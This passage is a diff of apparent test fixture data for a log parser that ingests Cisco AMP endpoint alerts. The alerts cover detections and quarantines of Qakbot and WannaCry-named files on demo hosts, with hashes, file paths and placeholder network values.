"host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7890, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "28242311.exe", + "process.pid": 4788, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, @@ -362,6 +498,112 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 10708, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 11817, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, @@ -1254,8 +1496,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", - "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303574240493599", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Malicious", @@ -1265,7 +1507,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 327000000, + "cisco.amp.timestamp_nanoseconds": 461000000, "event.action": "Threat Detected", "event.category": [ "file", @@ -1276,11 +1518,9 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", - "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "file.name": "u.wnry", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", @@ -1288,14 +1528,12 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 34828, + "log.offset": 31923, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "7bf2b57f2a205768755c07f238fb32cc", - "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1325,8 +1563,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", - "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303574240493597", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Malicious", @@ -1336,7 +1574,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 313000000, + "cisco.amp.timestamp_nanoseconds": 430000000, "event.action": "Threat Detected", "event.category": [ "file", @@ -1347,11 +1585,9 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", - "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "file.name": "@WanaDecryptor@.exe", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", @@ -1359,14 +1595,12 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 36357, + "log.offset": 33372, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", - "7bf2b57f2a205768755c07f238fb32cc", - "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1396,18 +1630,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303569945526290", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 664000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -1415,14 +1652,26 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 40152, + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, "related.hash": [ - "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1431,6 +1680,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1449,18 +1701,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303569945526289", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 664000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -1468,14 +1723,26 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 41272, + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, "related.hash": [ - "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1484,6 +1751,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1502,7 +1772,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.detection_id": "6419303574240493595", "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1521,14 +1791,14 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 42392, + "log.offset": 37912, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1544,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1555,10 +1825,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558982", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1566,24 +1834,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 782000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 43512, + "log.offset": 39032, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1599,7 +1867,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1610,10 +1878,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558980", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1621,24 +1887,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 44698, + "log.offset": 40152, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1654,7 +1920,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1665,10 +1931,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558979", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1676,24 +1940,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 45884, + "log.offset": 41272, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1709,7 +1973,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1720,10 +1984,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558978", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1731,24 +1993,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 47070, + "log.offset": 42392, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1775,8 +2037,10 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558981", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1785,7 +2049,7 @@ "53:74:31:cb:37:50" ], "cisco.amp.timestamp_nanoseconds": 782000000, - "event.action": "Threat Quarantined", + "event.action": "Quarantine Failure", "event.category": [ "malware" ], @@ -1799,7 +2063,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 51525, + "log.offset": 43512, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1828,8 +2092,10 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558977", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1838,7 +2104,7 @@ "53:74:31:cb:37:50" ], "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Threat Quarantined", + "event.action": "Quarantine Failure", "event.category": [ "malware" ], @@ -1852,7 +2118,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 52645, + "log.offset": 44698, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -1870,38 +2136,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:32.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648130, + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" ], - "cisco.amp.timestamp_nanoseconds": 199000000, - "event.action": "Policy Update", "event.dataset": "cisco.amp", - "event.id": 6412662859016176000, + "event.id": 6419303569945526000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 65285, + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -1914,38 +2191,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:31.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648130, + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" ], - "cisco.amp.timestamp_nanoseconds": 856000000, - "event.action": "Policy Update", "event.dataset": "cisco.amp", - "event.id": 6412662854721208000, + "event.id": 6419303569945526000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 66208, + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -1958,49 +2246,2038 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241035", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 580000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "8495400f199ac77853c53b5a3f278f3e", + "file.hash.sha1": "be5d6279874da315e3080b06083757aad9b32c23", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48256, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "8495400f199ac77853c53b5a3f278f3e", + "be5d6279874da315e3080b06083757aad9b32c23" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 564000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4fef5e34143e646dbf9907c4374276f5", + "file.hash.sha1": 